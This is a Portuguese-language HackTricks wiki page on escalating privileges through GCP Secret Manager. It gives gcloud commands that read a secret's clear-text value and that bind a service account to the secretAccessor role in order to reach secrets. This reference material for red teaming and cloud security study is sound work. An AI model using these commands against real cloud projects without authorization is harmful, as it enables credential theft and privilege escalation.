GCP - Secretmanager Privesc

Aprenda e pratique Hacking na AWS: HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking no GCP: HackTricks Training GCP Red Team Expert (GRTE)

Suporte ao HackTricks

Verifique os planos de assinatura!
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

secretmanager

Para mais informações sobre o secretmanager:

GCP - Secrets Manager Enum

`secretmanager.versions.access`

Isso lhe dá acesso para ler os segredos do secret manager e talvez isso possa ajudar na escalada de privilégios (dependendo das informações armazenadas dentro do segredo):

# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"

Como esta é também uma técnica pós-exploração, ela pode ser encontrada em:

GCP - Secretmanager Post Exploitation

`secretmanager.secrets.setIamPolicy`

Isso lhe dá acesso para ler os segredos do gerenciador de segredos, como usar:

gcloud secrets add-iam-policy-binding <scret-name> \
--member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
--role="roles/secretmanager.secretAccessor"

Aprenda e pratique Hacking AWS: Treinamento HackTricks AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: Treinamento HackTricks GCP Red Team Expert (GRTE)

Suporte o HackTricks

Verifique os planos de assinatura!
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

PreviousGCP - Run Privesc NextGCP - Serviceusage Privesc

Last updated 1 month ago